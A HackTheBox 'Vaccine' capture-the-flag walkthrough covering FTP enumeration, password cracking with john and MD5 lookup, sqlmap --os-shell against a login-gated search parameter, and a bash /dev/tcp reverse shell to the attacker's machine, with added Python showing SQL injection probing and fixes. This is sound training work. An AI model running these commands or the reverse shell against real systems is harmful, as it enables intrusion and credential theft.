HackTheBox Vaccine walkthrough (abandoned at the root flag stage because the target machine was unstable)

Task 1

Besides SSH and HTTP, what other service is hosted on this box?

Approach:

# nmap -sV 10.129.225.149

Answer: ftp

Task 2

This service can be configured to allow login with any password for specific username. What is that username?

Approach:

# nmap -sC 10.129.225.149

Scan result: Anonymous FTP login allowed (FTP code 230)

Answer: Anonymous

Task 3

What is the name of the file downloaded over this service?

Approach:

Log in to the FTP service anonymously:

# ftp 10.129.225.149

# ls shows the file backup.zip

Answer: backup.zip

Task 4

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

Approach:

The question itself gives it away: the archive has to be converted into a hash file that John can crack, and a quick Google search gives the name of the script.

Answer: zip2john

Task 5

What is the password for the admin user on the website?

Approach:

Before cracking with john, convert the archive into a hash file, then run john against that hash file with a wordlist:

# zip2john backup.zip > jason_password.hash

# john --wordlist=/usr/share/john/password.lst jason_password.hash

Recovered password: 741852963

Unzipping backup.zip with that password yields index.php and style.css.

index.php is the obvious place to look first, and it contains the username and the (MD5-hashed) password:

if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3")

So the next step is to crack that MD5 hash. It is an unsalted MD5 of the raw password, so a wordlist lookup is enough.

Cracking it online at https://md5decrypt.net gives: qwerty789

Answer: qwerty789
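The two cracking steps above (john against the zip hash, md5decrypt.net against the MD5) are the same idea: guess from a wordlist, hash, compare. The following is an added example, not code from the original post, that does the MD5 half offline with a constructed six-word wordlist standing in for /usr/share/john/password.lst, and beside it shows what index.php should have done instead (salted, slow KDF; the PHP equivalent is password_hash). TARGET_MD5 is the hash from index.php; everything else is assumed for illustration.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Hash copied from the index.php check shown above.
TARGET_MD5 = "2cb42f8734ea607eefed3b70af13bbd3"

# Constructed mini wordlist standing in for /usr/share/john/password.lst.
WORDLIST = ["password", "123456", "741852963", "letmein", "qwerty789", "admin"]


def crack_md5(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose unsalted MD5 equals target_hex, else None.

    This is all an online "MD5 decrypt" site or john does for a bare MD5:
    there is no salt, so one digest per guess is enough, and precomputed
    tables work just as well.
    """
    target = target_hex.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def hardened_store(password: str, iterations: int = 200_000) -> dict:
    """What the login check should rely on instead: a random per-user salt and a
    deliberately slow KDF (PBKDF2-HMAC-SHA256 here), so each guess costs
    `iterations` HMAC rounds and a cracked hash for one user says nothing
    about another user with the same password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": digest.hex()}


def hardened_verify(password: str, record: dict) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256",
        password.encode(),
        bytes.fromhex(record["salt"]),
        record["iterations"],
    )
    return hmac.compare_digest(digest.hex(), record["hash"])


if __name__ == "__main__":
    print("cracked:", crack_md5(TARGET_MD5, WORDLIST))
    rec = hardened_store("qwerty789")
    print("hardened verify:", hardened_verify("qwerty789", rec))
```

Note that the hardened record cannot be attacked with crack_md5 at all: the attacker would need the per-record salt and would pay the full PBKDF2 cost for every guess.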

 

Task 6

What option can be passed to sqlmap to try to get command execution via the sql injection?

Approach: run sqlmap -h and read the help.

Answer: --os-shell

Task 7

What program can the postgres user run as root using sudo?

Approach: I looked it up on Google.

Answer: vi

Log in to the target website (admin / qwerty789) and extract the session cookie, since dashboard.php is only reachable with an authenticated session:

Cookie: PHPSESSID=nf0htii0o4od30mo131doalb1p

{"PHPSESSID":"nf0htii0o4od30mo131doalb1p"}

sqlmap finds that the search parameter of dashboard.php is injectable, and --os-shell gives command execution on the box:

# sqlmap -u 'http://10.129.225.149/dashboard.php?search=sand' --cookie='PHPSESSID=nf0htii0o4od30mo131doalb1p' --os-shell
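The sqlmap run above does two things: it proves the search parameter is evaluated as SQL, then (because the backend is PostgreSQL and the application connects as the superuser postgres, as the connection string found later on the box shows) it uses stacked queries and COPY ... FROM PROGRAM to run OS commands. The following is an added example, not code from the original post or from the Vaccine box, that reproduces the first part in pure Python with an in-memory SQLite table: the injectable string-concatenated search query, the bound-parameter version that fixes it, and a boolean-based probe of the kind sqlmap uses to tell the two apart. The cars table, its rows and the query shape are assumptions; the real dashboard.php schema is not shown on the page, and SQLite cannot demonstrate the COPY FROM PROGRAM step.

```python
import sqlite3
from typing import Callable, List


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the carsdb database behind dashboard.php.
    The real table layout is not shown on the page; this schema is an assumption."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cars (name TEXT, type TEXT, fuel TEXT, engine TEXT)")
    conn.executemany(
        "INSERT INTO cars VALUES (?, ?, ?, ?)",
        [
            ("Sandero", "Sedan", "Diesel", "1000cc"),
            ("Elantra", "Sedan", "Gasoline", "1500cc"),
            ("Fiesta", "Hatchback", "Gasoline", "1200cc"),
        ],
    )
    return conn


def vulnerable_search(conn: sqlite3.Connection, search: str) -> List[str]:
    """The injectable pattern: the search parameter is pasted into the SQL text,
    so a quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = f"SELECT name FROM cars WHERE name LIKE '%{search}%'"
    return sorted(row[0] for row in conn.execute(sql))


def safe_search(conn: sqlite3.Connection, search: str) -> List[str]:
    """Same query with a bound parameter: whatever the input contains, it can only
    ever be a LIKE pattern, never SQL."""
    sql = "SELECT name FROM cars WHERE name LIKE ?"
    return sorted(row[0] for row in conn.execute(sql, (f"%{search}%",)))


def boolean_probe(search_fn: Callable[[str], List[str]], base: str) -> bool:
    """Boolean-based detection in the spirit of sqlmap: send one payload that keeps
    the WHERE clause true and one that forces it false. If the true payload returns
    the baseline rows and the false payload returns something else, the parameter
    is being evaluated as SQL. The trailing -- comments out the rest of the query."""
    baseline = search_fn(base)
    true_payload = f"{base}%' AND 1=1 --"
    false_payload = f"{base}%' AND 1=2 --"
    return search_fn(true_payload) == baseline and search_fn(false_payload) != baseline


if __name__ == "__main__":
    db = make_db()
    print("baseline:", vulnerable_search(db, "sand"))
    print("dump everything:", vulnerable_search(db, "%' OR 1=1 --"))
    print("vulnerable injectable?", boolean_probe(lambda s: vulnerable_search(db, s), "sand"))
    print("safe injectable?", boolean_probe(lambda s: safe_search(db, s), "sand"))
```

The probe is the same true/false comparison sqlmap reports as "boolean-based blind"; against the parameterized version both payloads simply match no car name, so the probe reports nothing.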

 

Spawn a reverse shell from the sqlmap os-shell (with a listener waiting on port 1234 on the Kali side):

# bash -c 'bash -i >& /dev/tcp/<IP address of the Kali Linux tun interface>/1234 0>&1'

Success.

Locate user.txt:

find / -type f -name user.txt 2>/dev/null

/var/lib/postgresql/user.txt

Reading that file gives the user flag: ec9b13ca4d6229cd5cc1e09980965bf7

Privilege escalation

First upgrade the reverse shell to an interactive TTY:

SHELL=/bin/bash script -q /dev/null

Then look for credentials in the web application's database connection code:

postgres@vaccine:/home/simon$ grep -C1 pg_connect /var/www/html/dashboard.php
        try {
          $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
        }
postgres@vaccine:/home/simon$

The hard-coded database password P@s5w0rd! is the obvious candidate for the postgres user's sudo password (Task 7 says vi can be run as root); the walkthrough stops here because the target machine was unstable.

posted @ 2022-03-28 19:33 Jason_huawen